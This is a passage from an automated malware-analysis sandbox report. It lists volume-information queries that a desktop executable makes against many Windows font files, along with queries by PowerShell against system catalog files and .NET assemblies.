Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\22#U0415.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
